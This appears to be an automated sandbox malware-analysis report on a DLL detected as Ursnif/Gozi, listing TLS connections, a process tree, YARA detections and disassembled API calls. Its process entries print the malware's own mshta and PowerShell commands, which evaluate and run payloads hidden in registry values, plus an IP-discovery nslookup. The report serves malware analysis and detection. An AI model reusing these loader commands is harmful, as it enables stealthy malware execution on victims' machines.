Feb 12, 2021 01:47:07.924952030 CET	87.248.118.23	443	192.168.2.4	49733	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.928540945 CET	151.101.1.44	443	192.168.2.4	49734	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.928540945 CET	151.101.1.44	443	192.168.2.4	49734	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4816 Parent PID: 6016

General

Start time:	01:46:58
Start date:	12/02/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\2200.dll'
Imagebase:	0xeb0000
File size:	121856 bytes
MD5 hash:	99D621E00EFC0B8F396F38D5555EB078
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 5032 Parent PID: 4816

General

Start time:	01:46:58
Start date:	12/02/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\2200.dll
Imagebase:	0x1260000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 3496 Parent PID: 4816

General

Start time:	01:46:58
Start date:	12/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4344 Parent PID: 3496

General

Start time:	01:46:59
Start date:	12/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff78bb20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6012 Parent PID: 4344

General

Start time:	01:46:59
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17410 /prefetch:2
Imagebase:	0xb20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5220 Parent PID: 4344

General

Start time:	01:47:58
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:82962 /prefetch:2
Imagebase:	0xb20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5484 Parent PID: 4344

General

Start time:	01:48:01
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17422 /prefetch:2
Imagebase:	0xb20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5612 Parent PID: 4344

General

Start time:	01:48:05
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17430 /prefetch:2
Imagebase:	0xb20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 5676 Parent PID: 3424

General

Start time:	01:48:11
Start date:	12/02/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff6c8980000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 3848 Parent PID: 5676

General

Start time:	01:48:13
Start date:	12/02/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, Author: CCN-CERT
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6140 Parent PID: 3848

General

Start time:	01:48:14
Start date:	12/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 3912 Parent PID: 3848

General

Start time:	01:48:20
Start date:	12/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Imagebase:	0x7ff6513e0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 5656 Parent PID: 3912

General

Start time:	01:48:22
Start date:	12/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA74F.tmp' 'c:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP'
Imagebase:	0x7ff6c1aa0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 5896 Parent PID: 3848

General

Start time:	01:48:24
Start date:	12/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Imagebase:	0x7ff6513e0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 204 Parent PID: 5896

General

Start time:	01:48:25
Start date:	12/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB5E5.tmp' 'c:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP'
Imagebase:	0x7ff6c1aa0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 3848

General

Start time:	01:48:30
Start date:	12/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, Author: CCN-CERT

Chronological Activities

Analysis Process: control.exe PID: 5152 Parent PID: 5032

General

Start time:	01:48:32
Start date:	12/02/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff7eee70000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, Author: CCN-CERT Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, Author: CCN-CERT

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 3656 Parent PID: 3424

General

Start time:	01:48:40
Start date:	12/02/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 2848 Parent PID: 5152

General

Start time:	01:48:40
Start date:	12/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff770330000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, Author: CCN-CERT Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, Author: CCN-CERT

Chronological Activities

Analysis Process: cmd.exe PID: 2204 Parent PID: 3424

General

Start time:	01:48:46
Start date:	12/02/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A4AC.bi1'
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4560 Parent PID: 2204

General

Start time:	01:50:09
Start date:	12/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 5032 Parent PID: 4816 regsvr32.exeCOMMON

Executed Functions

Function 00B27AFF, Relevance: 47.6, APIs: 25, Strings: 2, Instructions: 317memorylibrarynativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(00B3E268), ref: 00B27B1D

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

memset.NTDLL ref: 00B27B4E
RtlInitializeCriticalSection.NTDLL(05778D20), ref: 00B27B5F

Part of subcall function 00B2B1E7: RtlInitializeCriticalSection.NTDLL(00B3E240), ref: 00B2B20B
Part of subcall function 00B2B1E7: RtlInitializeCriticalSection.NTDLL(00B3E220), ref: 00B2B221
Part of subcall function 00B2B1E7: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B317C0), ref: 00B2B232
Part of subcall function 00B2B1E7: GetModuleHandleA.KERNEL32(00B3F01D), ref: 00B2B25F

Part of subcall function 00B21060: RtlAllocateHeap.NTDLL(00000000,-00000003,77109EB0), ref: 00B2107A

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060), ref: 00B27B88
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B317C0), ref: 00B27B99
CloseHandle.KERNEL32(000003E4), ref: 00B27BAD
GetUserNameA.ADVAPI32(00000000,?), ref: 00B27BF6
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B27C09
GetUserNameA.ADVAPI32(00000000,?), ref: 00B27C1E
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 00B27C4E
OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 00B27C63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B317C0), ref: 00B27C6D
CloseHandle.KERNEL32(00000000), ref: 00B27C77
GetShellWindow.USER32 ref: 00B27C92
GetWindowThreadProcessId.USER32(00000000), ref: 00B27C99
CreateEventA.KERNEL32(00B3E0D4,00000001,00000000,00000000,61636F4C,00000001,?,?), ref: 00B27D28
RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 00B27D52
OpenEventA.KERNEL32(00100000,00000000,057789B8), ref: 00B27D7A
CreateEventA.KERNEL32(00B3E0D4,00000001,00000000,057789B8), ref: 00B27D8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B317C0), ref: 00B27D93
GetLastError.KERNEL32(00B30120,00B3E04C,00B3E050), ref: 00B27E19
LoadLibraryA.KERNEL32(ADVAPI32.DLL,00B30120,00B3E04C,00B3E050), ref: 00B27E2D
SetEvent.KERNEL32(?,00B2046A,00000000,00000000), ref: 00B27EA6
RtlAllocateHeap.NTDLL(00000000,00000052,00B2046A), ref: 00B27EBB
wsprintfA.USER32 ref: 00B27EEB

Strings

ADVAPI32.DLL, xrefs: 00B27E28
0123456789ABCDEF, xrefs: 00B27B66

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemsetwsprintf
String ID: 0123456789ABCDEF$ADVAPI32.DLL
API String ID: 204107308-803475220
Opcode ID: 29cbb5368e9d0e1e8e3714306eb8763401ebfeb836e92bddde2ddc0f0a7c1787
Instruction ID: e32a85b424085cb31c5a9d9d22396e64a3e3240500b2d0ac67a93642dd463ab8
Opcode Fuzzy Hash: 29cbb5368e9d0e1e8e3714306eb8763401ebfeb836e92bddde2ddc0f0a7c1787
Instruction Fuzzy Hash: 2AB1CE705883159FC724AF65FD85A2F7BE9EB44700B2108AEF55AD32A0DF70E844CB66

Uniqueness

Uniqueness Score: -1.00%

Function 001F7DD8, Relevance: 22.7, APIs: 15, Instructions: 222filememorytimeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001F7E3F
CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 001F7E7D
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001F7E91
CloseHandle.KERNEL32(?), ref: 001F7EA8
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001F7EB4
lstrcat.KERNEL32(?,?), ref: 001F7EF5
FindFirstFileA.KERNELBASE(?,?), ref: 001F7F0B
FindNextFileA.KERNELBASE(001F9865,?), ref: 001F7F3D
StrChrA.SHLWAPI(?,0000002E), ref: 001F7FAB
memcpy.NTDLL(001F3FAE,?,00000000), ref: 001F7FE4
FindNextFileA.KERNELBASE(001F9865,?), ref: 001F7FF9
CompareFileTime.KERNEL32(?,?), ref: 001F8022
FindClose.KERNELBASE(001F9865), ref: 001F8057
HeapFree.KERNEL32(00000000,001F3FAE,?), ref: 001F8069
HeapFree.KERNEL32(00000000,?), ref: 001F8079

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: File$Find$CloseFreeHeapNextTime$CompareCreateFirstHandlelstrcatmemcpymemset
String ID:
API String ID: 4183405864-0
Opcode ID: 973738d084ee688aae3cc1aaf443af965961f7b89a4a96ad998a85e96d265918
Instruction ID: f142887c2670160bbb01e8428b28b0efcf0781aeb4ea1b0a672a222e4095feec
Opcode Fuzzy Hash: 973738d084ee688aae3cc1aaf443af965961f7b89a4a96ad998a85e96d265918
Instruction Fuzzy Hash: 33811A7190010DEFDB11DFA5DC84AFEBBB9FB48300F14446AE615E6260DB719A85DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B316A5, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00B3E0D8,00000000), ref: 00B316D3
StrRChrA.SHLWAPI(057785A8,00000000,0000005C,00000000,00000001,00000000,00B3E0B4,00000000,?), ref: 00B316E8
_strupr.NTDLL ref: 00B316FE
lstrlen.KERNEL32(057785A8), ref: 00B31706
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00B3E0B4,00000000,?), ref: 00B31786
RtlAddVectoredExceptionHandler.NTDLL(00000000,00B246B0), ref: 00B317AD
GetLastError.KERNEL32(?), ref: 00B317C7
RtlRemoveVectoredExceptionHandler.NTDLL(00B505B8), ref: 00B317DD

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
String ID:
API String ID: 1098824789-0
Opcode ID: 9b5c3a1c3de9ff31a45a8bedf7833e9b55cbf5a0c53c894e49bc6d6b8668ef99
Instruction ID: 45f42de6c5ba2e7bfb4d9bc5395ebf51c6bf7dff6a3f1afc13ef6452fe4de2e9
Opcode Fuzzy Hash: 9b5c3a1c3de9ff31a45a8bedf7833e9b55cbf5a0c53c894e49bc6d6b8668ef99
Instruction Fuzzy Hash: 6131C6B2900214AFD7149F7CACC59AE77D9E704710F3808AAF515D31D1DEB0DD448B61

Uniqueness

Uniqueness Score: -1.00%

Function 001F7925, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 001F796C
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 001F797F
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000,00000000), ref: 001F799B

Part of subcall function 001F550F: RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000,00000000), ref: 001F79B8
memcpy.NTDLL(00000000,00000000,0000001C), ref: 001F79C5
NtClose.NTDLL(00000000), ref: 001F79D7
NtClose.NTDLL(00000000), ref: 001F79E1

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: b87b6673ee7932e885739f5c6b6eea00f09e267ef4a08a64c0af2d3ce8be6ee9
Instruction ID: a2dcf57ba8b06ee2d62468752e32dfb089562248101c973176519f68b6b9572f
Opcode Fuzzy Hash: b87b6673ee7932e885739f5c6b6eea00f09e267ef4a08a64c0af2d3ce8be6ee9
Instruction Fuzzy Hash: B621F4B290021CABDB01AF95CC459EEBFB9EF08754F104026FA05E6161D7B18A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1ACD5, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 00B1AD1C
NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 00B1AD2F
NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 00B1AD4B

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 00B1AD68
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00B1AD75
NtClose.NTDLL(00000001), ref: 00B1AD87
NtClose.NTDLL(00000000), ref: 00B1AD91

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: cf944be302cb480545daf21cc9a780b1ed50f4fbb796068566a5d65488865db2
Instruction ID: f69a0a0ca0f46db95bc7a7ed259e17146bd67765734a45160a6ba66f37bafdab
Opcode Fuzzy Hash: cf944be302cb480545daf21cc9a780b1ed50f4fbb796068566a5d65488865db2
Instruction Fuzzy Hash: E721F8B2900618BBDB01AF95DC45ADEBFBDFF08740F204066F904E6120DBB19A449BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B27579, Relevance: 9.2, APIs: 6, Instructions: 234nativeCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(-00000040,00B2684B,00000800,00000000,00000000,?,00000B54), ref: 00B277BB

Part of subcall function 00B245CA: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,00B11440,?,?,?,?,00B27689,?,?,00000000,?,00000B54), ref: 00B245EF
Part of subcall function 00B245CA: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00B24611
Part of subcall function 00B245CA: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00B24627
Part of subcall function 00B245CA: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00B2463D
Part of subcall function 00B245CA: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00B24653
Part of subcall function 00B245CA: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00B24669

Part of subcall function 00B347A1: NtMapViewOfSection.NTDLL(00000000,000000FF,00B1E084,00000000,00000000,00B1E084,?,00000002,00000000,?,?,00000000,00B1E084,000000FF,?), ref: 00B347CF

Part of subcall function 00B176AC: memcpy.NTDLL(?,?,?,?,00000000,?,00000000,00000000,?,?,00000000,?,00000B54), ref: 00B17712
Part of subcall function 00B176AC: memcpy.NTDLL(?,?,?), ref: 00B17771

memcpy.NTDLL(?,?,?,?,00B11440,00000000,00000000,00000000,?,?,00000000,?,00000B54), ref: 00B276E8
memcpy.NTDLL(00000018,?,00000018,?,00B11440,00000000,00000000,00000000,?,?,00000000,?,00000B54), ref: 00B27734
NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000B54), ref: 00B277F9
NtClose.NTDLL(00000000,?,00000B54), ref: 00B27820
memset.NTDLL ref: 00B2783B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AddressProcmemcpy$SectionView$CloseHandleModuleUnmapmemset
String ID:
API String ID: 4028138328-0
Opcode ID: 98598b3d78b12965348d88140f32ca9bef502a2f3754e4f51505d6e96068f7d3
Instruction ID: d0ed86a24ff2b74c17739b6ed651293a81088adf466b3930910d65d554decd15
Opcode Fuzzy Hash: 98598b3d78b12965348d88140f32ca9bef502a2f3754e4f51505d6e96068f7d3
Instruction Fuzzy Hash: 06917C71900229EFCF11DF99D984BAEBBF0FF08304F1045A9E819A7261DB70AE54DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A027, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON

